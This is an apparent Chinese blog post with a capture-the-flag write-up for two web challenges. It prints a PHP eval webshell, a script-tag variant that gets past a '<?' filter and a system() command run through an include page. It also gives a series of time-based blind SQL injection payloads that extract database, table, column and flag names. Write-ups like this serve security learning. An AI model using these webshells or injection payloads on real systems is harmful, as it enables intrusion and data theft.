<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>zk十月赛 | 美豆的博客</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="easy-upload打开题目看见文件上传的页面，首先想到的是上传木马连菜刀。上传任意文件得到提示：文件只能是gif、jpg、png格式，所以上传一个图片文件，使用DOS命令在图片里插入一句话木马 12一句话木马：&amp;lt;?php @eval($_POST[&amp;apos;pass&amp;apos;]);?&amp;gt; 再次上传，得到提示不能有”&amp;lt;?”使用123&amp;lt;script language=&amp;q">
<meta name="keywords" content="zkctf,web">
<meta property="og:type" content="article">
<meta property="og:title" content="zk十月赛">
<meta property="og:url" content="http://yoursite.com/2019/10/24/zk十月赛/index.html">
<meta property="og:site_name" content="美豆的博客">
<meta property="og:description" content="easy-upload打开题目看见文件上传的页面，首先想到的是上传木马连菜刀。上传任意文件得到提示：文件只能是gif、jpg、png格式，所以上传一个图片文件，使用DOS命令在图片里插入一句话木马 12一句话木马：&amp;lt;?php @eval($_POST[&amp;apos;pass&amp;apos;]);?&amp;gt; 再次上传，得到提示不能有”&amp;lt;?”使用123&amp;lt;script language=&amp;q">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/Kae5id.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/KamMy6.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/KaZqUJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/Kam7tJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/KaZ7bF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/KamykQ.png">
<meta property="og:updated_time" content="2019-10-24T13:52:22.790Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="zk十月赛">
<meta name="twitter:description" content="easy-upload打开题目看见文件上传的页面，首先想到的是上传木马连菜刀。上传任意文件得到提示：文件只能是gif、jpg、png格式，所以上传一个图片文件，使用DOS命令在图片里插入一句话木马 12一句话木马：&amp;lt;?php @eval($_POST[&amp;apos;pass&amp;apos;]);?&amp;gt; 再次上传，得到提示不能有”&amp;lt;?”使用123&amp;lt;script language=&amp;q">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/10/24/Kae5id.png">
  
    <link rel="alternative" href="/atom.xml" title="美豆的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="https://lmcmc.github.io/img/favicon.ico">
  
  <link rel="stylesheet" href="/css/style.css">
  
  

  <script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>
  <script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>

  
      <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
<script>AV.initialize("7S69DnEEH3PVK38zUzHnIRj5-gzGzoHsz", "hbIfv1jdAgFoNluKfAFAnpjt");</script>
<script src="/js/Counter.js"></script>
  
  
</head></html>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="https://lmcmc.github.io/img/lmc.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/">美豆</a></h1>
		  
		</hgroup>

		
		<p class="header-subtitle">所谓无底深渊，下去，也是前程万里</p>
		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/web/" style="font-size: 12px;">web</a> <a href="/tags/web安全/" style="font-size: 10px;">web安全</a> <a href="/tags/writeup/" style="font-size: 20px;">writeup</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/zkctf/" style="font-size: 16px;">zkctf</a> <a href="/tags/代码审计/" style="font-size: 14px;">代码审计</a> <a href="/tags/攻防世界/" style="font-size: 18px;">攻防世界</a> <a href="/tags/杂记/" style="font-size: 10px;">杂记</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide">美豆</h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="https://lmcmc.github.io/img/lmc.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author">美豆</h1>
			</hgroup>
			
			<p class="header-subtitle">所谓无底深渊，下去，也是前程万里</p>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-zk十月赛" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/10/24/zk十月赛/" class="article-date">
  	<time datetime="2019-10-24T13:32:52.000Z" itemprop="datePublished">2019-10-24</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      zk十月赛
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/">web</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/zkctf/">zkctf</a></li></ul>
	</div>

        

        
          
<div class="counter-tag counter">
    <span id="/2019/10/24/zk十月赛/" class="leancloud_visitors post-title-link" style="font-size: 12px" data-flag-title="zk十月赛">
         &nbsp;
        view
    </span>
</div>

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="easy-upload"><a href="#easy-upload" class="headerlink" title="easy-upload"></a>easy-upload</h1><p>打开题目看见文件上传的页面，首先想到的是上传木马连菜刀。上传任意文件得到提示：文件只能是gif、jpg、png格式，所以上传一个图片文件，使用DOS命令在图片里插入一句话木马<br><img src="https://s2.ax1x.com/2019/10/24/Kae5id.png" alt="1"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">一句话木马：</span><br><span class="line">&lt;?php @eval($_POST[&apos;pass&apos;]);?&gt;</span><br></pre></td></tr></table></figure>
<p>再次上传，得到提示不能有”&lt;?”<br><img src="https://s2.ax1x.com/2019/10/24/KamMy6.png" alt="2"><br>使用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&quot;php&quot;&gt;</span><br><span class="line">@eval($_POST[&apos;mc&apos;]);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>绕过&lt;?的限制，再次上传，上传成功，并得到上传后的文件名。</p>
<p>接着利用御剑进行爆破扫描，得到几个可利用的目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./uploads/</span><br><span class="line">./include.php</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>在./uploads/里找到了自己上传的图片<br><img src="https://s2.ax1x.com/2019/10/24/KaZqUJ.png" alt="3"><br>连接菜刀期待得到flag</p>
<p>然后，连不上。。。</p>
<p>在题目放了提示二次渲染之后，学习了一波关于二次渲染的知识，（在这里分享一波我们 温柔的！yang学长 的文章<a href="https://xz.aliyun.com/t/2657" target="_blank" rel="noopener">https://xz.aliyun.com/t/2657</a> 太详细啦）<br>大致的看了关于二次渲染的知识后就开始尝试绕过，由于我的脑回路新奇吧加上没好好看学长这篇文章，我选择了上传jpg格式的图片[手动微笑]，然后就开始了漫长的生成jpg图片马的过程，以及为了生成它漫长的安装php gd库的过程[再次微笑]</p>
<p>png和jpg格式的文件绕过二次渲染比较麻烦，其实我们可以选择上传gif，只需要下载上传后的文件跟下载前的文件进行比对，找到渲染前后没有变化的位置,然后将php代码写进去即可成功绕过</p>
<p>然后绕过之后，依然连不上菜刀hhhhhh</p>
<p>but代码执行不了可以构造命令执行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=php&gt;system(&quot;ls&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>post传参访问图片的包含路径（刚刚扫描到的路径./include.php）<br><img src="https://s2.ax1x.com/2019/10/24/Kam7tJ.png" alt="4"><br>看到一个，名为flag的文件，cat这个文件，得到flag<br><img src="https://s2.ax1x.com/2019/10/24/KaZ7bF.png" alt="5"></p>
<h1 id="easy-sql"><a href="#easy-sql" class="headerlink" title="easy_sql"></a>easy_sql</h1><p>一道关于时间的盲注，过滤掉了一些字符<br><img src="https://s2.ax1x.com/2019/10/24/KamykQ.png" alt="6"><br>第一步爆数据库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select * from (( select sleep(ascii(mid(database() from (1) for (1))) &gt;119))A join (select 2)B join (select 6)C) #</span><br><span class="line"></span><br><span class="line">一个字母一个字母的爆.....是不是有点菜了，得到数据库&quot;web&quot;</span><br></pre></td></tr></table></figure>
<p>第二步爆表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select * from (( select sleep(((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema regexp database()) from (1) for (1)))) &lt; 97)/(1/5)))A join (select 2)B join (select 3)C) #</span><br><span class="line"></span><br><span class="line">表名article</span><br></pre></td></tr></table></figure>
<p>第三步爆字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select * from (( select sleep(((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name regexp &apos;article&apos;) from (1) for (1)))) &lt; 105)/(1/5)))A join (select 2)B join (select 3)C) #</span><br><span class="line"></span><br><span class="line">得到id,username,flag...</span><br></pre></td></tr></table></figure>
<p>第四步爆flag字段的数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos; union select * from (( select sleep(((ascii(mid((select flag from article) from (1) for (1)))) &lt;102)/(1/5)))A join (select 2)B join (select 3)C) #</span><br></pre></td></tr></table></figure>
<p>得到flag</p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/11/04/git源码泄露/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          git源码泄露
        
      </div>
    </a>
  
  
    <a href="/2019/10/17/攻防世界crypto新手wp（3）/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">攻防世界crypto新手wp（3）</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="zk十月赛" data-title="zk十月赛" data-url="http://yoursite.com/2019/10/24/zk十月赛/" data-images="https://lmcmc.github.io/img/lmc.jpg" data-content="zk十月赛">
    <div class="ds-share-inline">
      <ul class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2019 美豆
      </div>
        <div class="footer-right">
          <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
          
      <span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">


<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>
<script src="/js/main.js"></script>



<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>